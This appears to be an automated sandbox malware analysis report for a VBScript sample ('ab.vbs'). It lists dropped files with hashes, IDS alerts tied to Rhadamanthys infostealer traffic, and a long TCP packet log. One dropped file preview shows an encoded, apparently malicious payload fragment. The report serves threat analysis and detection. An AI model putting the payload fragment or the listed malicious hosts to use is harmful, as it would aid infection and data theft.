                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\SmartScreen\RemoteData\edgeSettings

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):18
                                                                                                              Entropy (8bit):3.5724312513221195
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:kDnaV6bVon:kDYa2
                                                                                                              MD5:5692162977B015E31D5F35F50EFAB9CF
                                                                                                              SHA1:705DC80E8B32AC8B68F7E13CF8A75DCCB251ED7D
                                                                                                              SHA-256:42CCB5159B168DBE5D5DDF026E5F7ED3DBF50873CFE47C7C3EF0677BB07B90D4
                                                                                                              SHA-512:32905A4CC5BCE0FE8502DDD32096F40106625218BEDC4E218A344225D6DF2595A7B70EEB3695DCEFDD894ECB2B66BED479654E8E07F02526648E07ACFE47838C
                                                                                                              Malicious:false
                                                                                                              Preview:edgeSettings_2.0-0

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\SmartScreen\RemoteData\edgeSettings_2.0-0

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:JSON data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):3581
                                                                                                              Entropy (8bit):4.459693941095613
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:JTMhnytNaSA4BOsNQNhnUZTFGKDIWHCgL5tfHaaJzRHF+P1sYmnfHUdT+GWBH7Y/:KyMot7vjFU
                                                                                                              MD5:BDE38FAE28EC415384B8CFE052306D6C
                                                                                                              SHA1:3019740AF622B58D573C00BF5C98DD77F3FBB5CD
                                                                                                              SHA-256:1F4542614473AE103A5EE3DEEEC61D033A40271CFF891AAA6797534E4DBB4D20
                                                                                                              SHA-512:9C369D69298EBF087412EDA782EE72AFE5448FD0D69EA5141C2744EA5F6C36CDF70A51845CDC174838BAC0ADABDFA70DF6AEDBF6E7867578AE7C4B7805A8B55E
                                                                                                              Malicious:false
                                                                                                              Preview:{"models":[],"geoidMaps":{"gw_my":"https://malaysia.smartscreen.microsoft.com/","gw_tw":"https://taiwan.smartscreen.microsoft.com/","gw_at":"https://austria.smartscreen.microsoft.com/","gw_es":"https://spain.smartscreen.microsoft.com/","gw_pl":"https://poland.smartscreen.microsoft.com/","gw_se":"https://sweden.smartscreen.microsoft.com/","gw_kr":"https://southkorea.smartscreen.microsoft.com/","gw_br":"https://brazil.smartscreen.microsoft.com/","au":"https://australia.smartscreen.microsoft.com/","dk":"https://denmark.smartscreen.microsoft.com/","gw_sg":"https://singapore.smartscreen.microsoft.com/","gw_fr":"https://france.smartscreen.microsoft.com/","gw_ca":"https://canada.smartscreen.microsoft.com/","test":"https://eu-9.smartscreen.microsoft.com/","gw_il":"https://israel.smartscreen.microsoft.com/","gw_au":"https://australia.smartscreen.microsoft.com/","gw_ffl4mod":"https://unitedstates4.ss.wd.microsoft.us/","gw_ffl4":"https://unitedstates1.ss.wd.microsoft.us/","gw_eu":"https://europe.

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):47
                                                                                                              Entropy (8bit):4.493433469104717
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:kfKbQSQSuLA5:kyUc5
                                                                                                              MD5:3F90757B200B52DCF5FDAC696EFD3D60
                                                                                                              SHA1:569A2E1BED9ECCDF7CD03E270AEF2BD7FF9B0E77
                                                                                                              SHA-256:1EE63F0A3502CFB7DF195FABBA41A7805008AB2CCCDAEB9AF990409D163D60C8
                                                                                                              SHA-512:39252BBAA33130DF50F36178A8EAB1D09165666D8A229FBB3495DD01CBE964F87CD2E6FCD479DFCA36BE06309EF18FEDA7F14722C57545203BBA24972D4835C8
                                                                                                              Malicious:false
                                                                                                              Preview:synchronousLookupUris_636976985063396749.rel.v2

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\SmartScreen\RemoteData\synchronousLookupUris_636976985063396749.rel.v2

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):35302
                                                                                                              Entropy (8bit):7.99333285466604
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                              MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                              SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                              SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                              SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                              Malicious:false
                                                                                                              Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Variations

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:JSON data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):86
                                                                                                              Entropy (8bit):4.3751917412896075
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQan:YQ3Kq9X0dMgAEwjM
                                                                                                              MD5:961E3604F228B0D10541EBF921500C86
                                                                                                              SHA1:6E00570D9F78D9CFEBE67D4DA5EFE546543949A7
                                                                                                              SHA-256:F7B24F2EB3D5EB0550527490395D2F61C3D2FE74BB9CB345197DAD81B58B5FED
                                                                                                              SHA-512:535F930AFD2EF50282715C7E48859CC2D7B354FF4E6C156B94D5A2815F589B33189FFEDFCAF4456525283E993087F9F560D84CFCF497D189AB8101510A09C472
                                                                                                              Malicious:false
                                                                                                              Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":0}

                                                                                                              C:\Users\user\AppData\Roaming\Nonfattening.Ret

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):440292
                                                                                                              Entropy (8bit):5.9509405120024175
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:kxqHKFBb4NeSrNqeMrkZIFVn6xFVJeWO6:kLFfSrNlvmv63VJeWO6
                                                                                                              MD5:1D09A8DF714912C34158386A43692413
                                                                                                              SHA1:132D9EB5E437866FF1F21461C3B592469936392B
                                                                                                              SHA-256:19B60785CB8536773C8709E30F54A824CFEA094E4022C7E255203E498515865D
                                                                                                              SHA-512:380E501F84A3E5904CBA426EAB0EE715105DF2F918D20030BAF74AABEB799E8586FEB343A1F5CCF331843339D413BF314671D275F7D198EE147492D2E64C5F28
                                                                                                              Malicious:false
                                                                                                              Preview:6wJoZnEBm7vY9wkA6wLUjOsCPkUDXCQEcQGbcQGbubkDYorrAlNI6wIKtIHxuPVv5XEBm3EBm4HB/wnykOsColdxAZtxAZtxAZu6MgWBWesCS7frApSMcQGb6wIO4zHKcQGbcQGbiRQLcQGbcQGb0eLrAg9EcQGbg8EE6wLivOsCEFCB+ega/wN8zOsCjMDrAt+yi0QkBOsCtWPrAl15icNxAZvrAsC4gcOi82cA6wILWXEBm7obloPN6wIXAnEBm4HC7NId7usCtANxAZuB6gdpobtxAZvrAtfU6wItyHEBm+sCLRzrAvFhiwwQcQGbcQGbiQwT6wIYkusC7klC6wK4iHEBm4H6wJUEAHXUcQGbcQGbiVwkDOsCnh1xAZuB7QADAABxAZtxAZuLVCQI6wINj3EBm4t8JATrAn5JcQGbievrAhpBcQGbgcOcAAAAcQGb6wKiMFNxAZtxAZtqQOsCiKPrAn+pievrAoEH6wIX48eDAAEAAAAgDARxAZvrAvkvgcMAAQAAcQGb6wIQ5lPrAlAbcQGbietxAZvrAnhIibsEAQAAcQGb6wKL24HDBAEAAOsCZM7rAkMtU3EBm+sCVFpq/+sCD67rAmFrg8IF6wLcxesCFI0x9nEBm3EBmzHJcQGb6wIvZIsa6wI6+3EBm0HrArze6wJi4DkcCnXy6wLaPesCnQVGcQGbcQGbgHwK+7h13OsChrPrAuK9i0QK/OsC2hdxAZsp8OsC3NtxAZv/0nEBm3EBm7rAlQQAcQGb6wKx4DHAcQGb6wIeZ4t8JAxxAZtxAZuBNAdAda/f6wJfgHEBm4PABOsCArRxAZs50HXkcQGbcQGbifvrAlRv6wL4v//XcQGbcQGbqHCv30ATLiSyP/RfvYEG1y8u8CmGziY6wZmbslpxLht0H7XbFfxKZvLnDk7BhLettvMuLjb10LTBhGu/aAmWHYcxot9eIyI7xL4uq011d26XFi6rTXWpBYdzk2zBGaLf

                                                                                                              C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:JSON data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):55
                                                                                                              Entropy (8bit):4.306461250274409
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                              Malicious:false
                                                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:ASCII text, with CRLF line terminators
                                                                                                              Entropy (8bit):5.1393254819055185
                                                                                                              TrID:
                                                                                                              • Visual Basic Script (13500/0) 100.00%
                                                                                                              File name:ab.vbs
                                                                                                              File size:45'982 bytes
                                                                                                              MD5:d7782420dddbd95fd746c9e59fb24523
                                                                                                              SHA1:481eda9f024eee0a42eee72e423a8c88eee219fe
                                                                                                              SHA256:50277ebb2a5a87057ad1198b5432e76a8c0115c6dcb485cc1a2060e420f1b3be
                                                                                                              SHA512:eb98b922dc3cbaff65f1528347f981260ec2e864df2ba5ce9517f0231d0dc689ff57d9ad6b4287e8031ba1820e36ff5cf8b651e24da16f16c07a9baded21bb34
                                                                                                              SSDEEP:768:62ZSuxpkx/1EuE8BLsGmKuQu/G4bvYFbaxQ7N4x5fj5EObTsrNJD:62LmAGDuju3giNcN5d0JD
                                                                                                              TLSH:562306AA9F3DB2370B4D26579F423957B5F841060F3200E87EA51E49702F598B3F922E
                                                                                                              File Content Preview:..'Muldyrenes mura, rustvognes, precognizing; skytsengel,..'Synkronsvmningernes34, kjolesmmens, unoriginal tankelseste83..'Heterodoxies132! murga? sulphurless?....'Antipodistens104; imperfect....'Kryptograferedes. underpantene195; ghettoes; keps....'Brand

                                                                                                              File Icon

                                                                                                              Icon Hash:68d69b8f86ab9a86

                                                                                                              Network Behavior

                                                                                                              Suricata IDS Alerts

                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2024-12-05T10:38:11.816369+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert145.149.241.141443192.168.2.750002TCP
                                                                                                              2024-12-05T10:39:15.799172+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749831202.71.109.228443TCP
                                                                                                              2024-12-05T10:39:23.551192+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert145.149.241.1412023192.168.2.749852TCP
                                                                                                              2024-12-05T10:39:46.626899+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert145.149.241.1412023192.168.2.749921TCP
                                                                                                              2024-12-05T10:39:46.626899+01002854824ETPRO JA3 HASH Suspected Malware Related Response245.149.241.1412023192.168.2.749921TCP
                                                                                                              2024-12-05T10:39:58.412073+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert145.149.241.1412023192.168.2.749952TCP
                                                                                                              2024-12-05T10:39:58.412073+01002854824ETPRO JA3 HASH Suspected Malware Related Response245.149.241.1412023192.168.2.749952TCP
                                                                                                              2024-12-05T10:40:07.840436+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert145.149.241.141443192.168.2.749973TCP
                                                                                                              2024-12-05T10:40:15.007376+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert145.149.241.141443192.168.2.749994TCP
                                                                                                              2024-12-05T10:40:22.187139+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert145.149.241.141443192.168.2.750001TCP

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Dec 5, 2024 10:38:29.507162094 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:29.507196903 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:29.507262945 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:29.514704943 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:29.514738083 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:30.856513023 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:30.856764078 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:30.860193014 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:30.860200882 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:30.860517979 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:30.869946957 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:30.911329985 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.343286991 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.394068003 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.535717010 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.535729885 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.535748005 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.535758018 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.535794020 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.535978079 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.535978079 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.536001921 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.536662102 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.584197998 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.584212065 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.584249020 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.584275961 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.584321022 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.584333897 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.584417105 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.584417105 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.648624897 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.648647070 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.648771048 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.648778915 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.648832083 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.753120899 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.753146887 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.753417969 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.753424883 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.753473043 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.782531023 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.782555103 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.782788038 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.782803059 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.782938957 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.811949968 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.811968088 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.812242985 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.812251091 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.812350035 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.920424938 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.920449018 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.920515060 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.920533895 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.920603037 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.938998938 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.939018011 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.939105034 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.939105034 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.939120054 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.939209938 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.957348108 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.957370996 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.957480907 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.957488060 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.957540035 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.957540035 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.972665071 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.972686052 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.972794056 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.972799063 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.972835064 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.972835064 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.986927986 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.986959934 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.987077951 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.987086058 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.987122059 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.987138033 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.997752905 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.997777939 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.997858047 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.997864962 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:31.997893095 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:31.997960091 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.045253992 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.045299053 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.045370102 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.045370102 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.045377970 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.045456886 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.116631031 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.116652966 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.116733074 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.116740942 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.116801023 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.127124071 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.127144098 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.127243996 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.127262115 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.127316952 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.137151957 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.137167931 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.137248993 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.137255907 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.137307882 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.145313025 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.145330906 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.145410061 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.145415068 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.145452976 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.145452976 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.155147076 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.155164003 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.155226946 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.155231953 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.155282021 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.155293941 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.164433956 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.164450884 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.164544106 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.164549112 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.164637089 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.164637089 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.178234100 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.178257942 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.178340912 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.178348064 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.178400993 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.178400993 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.221640110 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.221662998 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.221730947 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.221748114 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.221786976 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.221801996 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.307423115 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.307445049 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.307502031 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.307693958 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.307701111 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.307780981 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.313668013 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.313688040 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.313803911 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.313810110 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.313915014 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.319379091 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.319395065 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.319458961 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.319464922 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.319528103 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.319528103 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.325824022 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.325844049 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.325998068 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.326013088 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.326052904 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.332293987 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.332312107 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.332385063 CET49730443192.168.2.768.66.226.116
                                                                                                              Dec 5, 2024 10:38:32.332390070 CET4434973068.66.226.116192.168.2.7
                                                                                                              Dec 5, 2024 10:38:32.332552910 CET49730443192.168.2.768.66.226.116
